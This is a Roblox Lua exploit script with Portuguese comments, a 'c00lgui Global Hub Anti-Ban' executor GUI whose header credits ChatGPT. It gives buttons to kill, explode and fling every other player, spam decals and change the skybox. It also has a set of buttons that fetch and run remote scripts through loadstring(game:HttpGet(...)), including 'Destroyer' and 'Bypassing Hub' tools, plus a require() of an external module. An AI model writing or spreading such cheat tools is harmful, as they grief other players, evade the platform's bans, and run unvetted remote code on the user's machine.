-- c00lgui Global Hub Anti-Ban com comandos executor e transformação "be c00lkidd" -- by ChatGPT adaptado pra você local Players = game:GetService("Players") local LocalPlayer = Players.LocalPlayer local CoreGui = game:GetService("CoreGui") local UIS = game:GetService("UserInputService") local Debris = game:GetService("Debris") local Lighting = game:GetService("Lighting") -- Mensagem de feedback local function c00lmessage(text) local msg = Instance.new("Message", workspace) msg.Text = text or "c00l!" Debris:AddItem(msg, 3) end -- GUI principal local ScreenGui = Instance.new("ScreenGui", CoreGui) ScreenGui.Name = "c00lgui_GlobalAntiBan" ScreenGui.ResetOnSpawn = false local Border = Instance.new("Frame", ScreenGui) Border.Size = UDim2.new(0, 550, 0, 550) Border.Position = UDim2.new(0.5, -275, 0.5, -275) Border.BackgroundColor3 = Color3.fromRGB(255, 0, 0) Border.BorderSizePixel = 0 Border.Active = true Border.Draggable = true local Frame = Instance.new("Frame", Border) Frame.Size = UDim2.new(1, -10, 1, -10) Frame.Position = UDim2.new(0, 5, 0, 5) Frame.BackgroundColor3 = Color3.fromRGB(15, 15, 15) Frame.BorderSizePixel = 0 local Title = Instance.new("TextLabel", Frame) Title.Size = UDim2.new(1, 0, 0, 40) Title.Text = "🔥 c00lgui Global Hub Anti-Ban 🔥" Title.TextScaled = true Title.Font = Enum.Font.GothamBold Title.TextColor3 = Color3.new(1, 1, 1) Title.BackgroundTransparency = 1 -- Cria inputs de configuração local function createInputField(labelText, posY) local lbl = Instance.new("TextLabel", Frame) lbl.Position = UDim2.new(0, 10, 0, posY) lbl.Size = UDim2.new(0.3, 0, 0, 20) lbl.Text = labelText; lbl.TextColor3 = Color3.new(1,1,1) lbl.BackgroundTransparency = 1 lbl.Font = Enum.Font.SourceSans local box = Instance.new("TextBox", Frame) box.Position = UDim2.new(0.3, 10, 0, posY) box.Size = UDim2.new(0.6, 0, 0, 20) box.Text = ""; box.TextColor3 = Color3.new(1,1,1) box.BackgroundColor3 = Color3.fromRGB(40,40,40) box.ClearTextOnFocus = false box.Font = Enum.Font.SourceSans box.TextScaled = true return box end local musicBox = createInputField("Música ID:", 70) local decalBox = createInputField("Decal Spam ID:", 100) local skyBox = createInputField("Skybox ID:", 130) local ScrollingFrame = Instance.new("ScrollingFrame", Frame) ScrollingFrame.Position = UDim2.new(0,10,0,160) ScrollingFrame.Size = UDim2.new(1,-20,1,-170) ScrollingFrame.CanvasSize = UDim2.new(0,0,3,0) ScrollingFrame.ScrollBarThickness = 6 ScrollingFrame.BackgroundTransparency = 1 -- Função para criar botões local function createButton(name, callback) local btn = Instance.new("TextButton", ScrollingFrame) btn.Size = UDim2.new(1, 0, 0, 35) btn.Text = name btn.Font = Enum.Font.Gotham btn.TextScaled = true btn.BackgroundColor3 = Color3.fromRGB(40, 40, 40) btn.TextColor3 = Color3.new(1, 1, 1) btn.MouseButton1Click:Connect(callback) end -- Funções principais createButton("Kill All", function() for _, p in pairs(Players:GetPlayers()) do if p ~= LocalPlayer and p.Character and p.Character:FindFirstChild("Humanoid") then p.Character.Humanoid.Health = 0 end end c00lmessage("Kill all ativado!") end) createButton("Explode All", function() for _, p in pairs(Players:GetPlayers()) do if p ~= LocalPlayer and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then local e = Instance.new("Explosion") e.Position = p.Character.HumanoidRootPart.Position e.Parent = workspace e.BlastPressure = 500000; e.BlastRadius = 10 end end c00lmessage("Explode all ativado!") end) createButton("Fling All", function() if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then for _, p in pairs(Players:GetPlayers()) do if p ~= LocalPlayer and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then local bv = Instance.new("BodyVelocity") bv.Velocity = Vector3.new(0,5000,0) bv.MaxForce = Vector3.new(1e9,1e9,1e9) bv.Parent = p.Character.HumanoidRootPart Debris:AddItem(bv, 0.3) end end c00lmessage("Fling ativado!") else c00lmessage("Personagem não pronto!") end end) createButton("Mini Size", function() for _, p in pairs(Players:GetPlayers()) do if p.Character and p.Character:FindFirstChild("HumanoidRootPart") then p.Character.HumanoidRootPart.Size = Vector3.new(1,1,1) end end c00lmessage("Mini size ativado!") end) createButton("Decal Spam", function() local ID = decalBox.Text if ID == "" then return c00lmessage("Insira Decal ID.") end for _, v in pairs(workspace:GetDescendants()) do if v:IsA("BasePart") then local pe = Instance.new("ParticleEmitter", v) pe.Texture = "rbxassetid://"..ID pe.Rate = 200 Debris:AddItem(pe, 20) end end c00lmessage("Decal spam iniciado!") end) createButton("Mudar Skybox", function() local asset = skyBox.Text if asset == "" then return c00lmessage("Insira Skybox ID.") end local sky = Instance.new("Sky") for _, face in ipairs({"Bk","Dn","Ft","Lf","Rt","Up"}) do sky["Skybox"..face] = "rbxassetid://"..asset end sky.Parent = Lighting c00lmessage("Skybox alterado!") end) createButton("Play Music", function() local sid = musicBox.Text if sid == "" then return c00lmessage("Insira ID de música.") end local ex = workspace:FindFirstChild("c00lguiMusic") if ex then ex:Stop(); ex:Destroy() end local sound = Instance.new("Sound", workspace) sound.Name = "c00lguiMusic" sound.SoundId = "rbxassetid://"..sid sound.Looped = true; sound.Volume = 1 sound:Play() c00lmessage("Música tocando!") end) -- Abas estilo executor com loadstrings local scriptButtons = { {"c00lgui v2.2 by team c00lkidd", function() loadstring(game:HttpGet("https://[Log in to view URL]", true))() end}, {"Destroyer GUI", function() loadstring(game:HttpGet("https://[Log in to view URL]", true))() end}, {"c00lgui reborn v0.5", function() loadstring(game:GetObjects("rbxassetid://8127297852")[1].Source)() end}, {"FE GAMEPASS UI", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Twilight Daycare Destroyer", function() loadstring(game:HttpGet("https://[Log in to view URL]"))(" Watermelon ? ") end}, {"FE Build And Survive Destroyer", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Bypassing Hub GUI", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Tools Drop [FREE ADMIN]", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Troll GUI", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Btools", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"FE Hub Script [Best]", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, {"RC7 (Executor)", function() loadstring(game:HttpGet("https://[Log in to view URL]"))() end}, } for _, v in pairs(scriptButtons) do createButton(v[1], v[2]) end -- Botão que transforma seu personagem em "c00lkidd" createButton("be c00lkidd", function() pcall(function() require(5225767191).load("c00lkidd") end) c00lmessage("Tentou se transformar em c00lkidd...") end) -- Change DisplayName local createButton("Change DisplayName", function() local humanoid = LocalPlayer.Character and LocalPlayer.Character:FindFirstChildOfClass("Humanoid") if humanoid then humanoid.DisplayName = "c00lkidd" c00lmessage("DisplayName definido como c00lkidd!") end end) -- Toggle da GUI com RightShift Border.Visible = true UIS.InputBegan:Connect(function(input, g) if not g and input.KeyCode == Enum.KeyCode.RightShift then Border.Visible = not Border.Visible end end) print("c00lgui Global Hub Anti-Ban carregado totalmente!")